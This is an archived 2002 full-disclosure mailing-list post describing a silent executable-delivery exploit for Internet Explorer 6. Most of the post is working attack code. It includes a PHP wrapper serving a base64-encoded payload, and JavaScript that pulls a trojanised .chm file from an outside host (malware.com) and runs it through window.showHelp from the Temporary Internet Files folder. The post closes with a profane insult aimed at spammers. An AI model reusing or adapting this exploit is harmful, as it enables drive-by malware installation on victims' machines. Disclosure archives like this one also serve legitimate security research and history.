lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <200208130241.g7D2f8Fn063436@mail41.megamailservers.com>
From: http-equiv at malware.com (http-equiv@...ite.com)
Subject: SAME LADY, DIFFERENT DRESS: Internet Explorer 6

Monday, August 12, 2002

Yet another  silent delivery and installation of an executable on the 
target computer using Internet Exlorer 6. This can be achieved by 
reversing the following:

http://online.securityfocus.com/bid/5350

And:

HTM. In order to to achieve the required results as outlined in the 
above, we must determine the location of the Temporary Internet File 
[TIF] folders.  This can only be achieved if we can physically open 
up our file from within and read its location. Technically that can 
only be achieved if we have a security dialogue prompt asking us for 
permission. If we elect to open the file through acceptance of the 
security warning dialogue, it is opened from within the TIF by 
whatever program is associated with that file.

Okay:

Okay. HTM. HTM files are associated with Internet Explorer. We force 
our *.htm file open via a combination of server `misconfiguration` 
and our PHP 'package' as below:

<?
function malware() 
{
header("Content-type: text/html");
header("Content-Disposition: attachment");
echo base64_decode(
'PGltZyBkeW5zcmM9Imh0dHA6Ly93d3cubWFsd2FyZS5jb20vbW'.
'Fsd2FyZS9tYWx3YXJlLmNobSIgd2lkdGg9MSBoZWlnaHQ9MT4N'.
'Cg0KPFNDUklQVD4NCg0KLy8gNy4wMi4wMiBodHRwOi8vd3d3Lm'.
'1hbHdhcmUuY29tDQoNCi8vIHlvdSBtYXkgY29uc2lkZXIgd3Jp'.
'dGluZyBzZXZlcmFsIGxpbmVzDQovLyBpbiBjYXNlIG1hbHdhcm'.
'UuY2htIGFycml2ZXMgYXMgWzFdIG9yIFsyXSBldGMNCg0KZnVu'.
'Y3Rpb24gbWFsd2FyZSgpDQp7DQpzPWRvY3VtZW50LlVSTDsNCn'.
'BhdGg9cy5zdWJzdHIoLTAscy5sYXN0SW5kZXhPZigiXFwiKSk7'.
'DQpwYXRoPXVuZXNjYXBlKHBhdGgpOw0KZG9jdW1lbnQud3JpdG'.
'UoJzxGT1JNIG5hbWU9Im1hbHdhcmUiIEFDVElPTj0iamF2YXNj'.
'cmlwdDp3aW5kb3cuc2hvd0hlbHAoZG9jdW1lbnQuZm9ybXNbMF'.
'0uZWxlbWVudHNbMF0udmFsdWUpIj4nKTsNCmRvY3VtZW50Lndy'.
'aXRlKCc8Zm9ybT48aW5wdXQgdHlwZT0iaGlkZGVuIiAgc2l6ZT'.
'0iNDAiIG1heGxlbmd0aD0iODAiIHZhbHVlPSInK3BhdGgrJ1xc'.
'bWFsd2FyZVsxXS5jaG0iPjwvZm9ybT4nKTsNCnNldFRpbWVvdX'.
'QoJ2RvY3VtZW50Lm1hbHdhcmUuc3VibWl0KCknLDEwMDAwKTsN'.
'CiB9IA0Kc2V0VGltZW91dCgibWFsd2FyZSgpIiwyNTAwKTsgIA'.
'0KPC9TQ1JJUFQ+DQogDQoNCg=='.'');}
{ malware(); }
PHP ?>

  <iframe src=<? echo $PHP_SELF ?> width=1 height=1> 

Where our PHP 'package' contains our now run-of-the-mill scripting to 
determine our TIF location and our old friend the trojanised *.chm 
file as follows:

<img dynsrc="http://www.malware.com/malware/malware.chm" width=1 
height=1>

<SCRIPT>

// 7.02.02 http://www.malware.com

function malware()
{
s=document.URL;
path=s.substr(-0,s.lastIndexOf(""));
path=unescape(path);
document.write('<FORM name="malware" 
ACTION="javascript:window.showHelp(document.forms[0].elements
[0].value)">');
document.write('<form><input type="hidden"  size="40" maxlength="80" 
value="'+path+'malware[1].chm"></form>');
setTimeout('document.malware.submit()',10000);
 } 
setTimeout("malware()",2500);  
</SCRIPT>

note: file path for *.chm must be long as we are now operating off 
the server and from within the TIF

What this does is generate the default security warning for *.htm 
flles:

[screen shot: http://www.malware.com/malwarez.png 7KB]

Should we elect to open it,  we are once again able to determine our 
TIF location where our *.chm is now residing too and fire our 
scripting to locate and call it.

[screen shot: http://www.malware.com/zerawlam.png 7KB]

Notes:

1. As indicated this is the reverse for :  
http://online.securityfocus.com/bid/5350 . In this instance the 
default is the security warning which should be disengaged to allow 
this to fail.
2 Tested series of win98 machines, Internet Explorer 6.0.2600 and all 
of its bandages
4. We anxiously await the release of Internet Explorer 6 SP1. 

Special Note: would the gang of Nigerians who have taken up squatting 
on these security mailing lists and who feel it is necessary to 
continuously request our assistance with their multiple millions of 
dollars every day, kindly fuck off and die. Thank you.

End Call


-- 
http://www.malware.com







Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ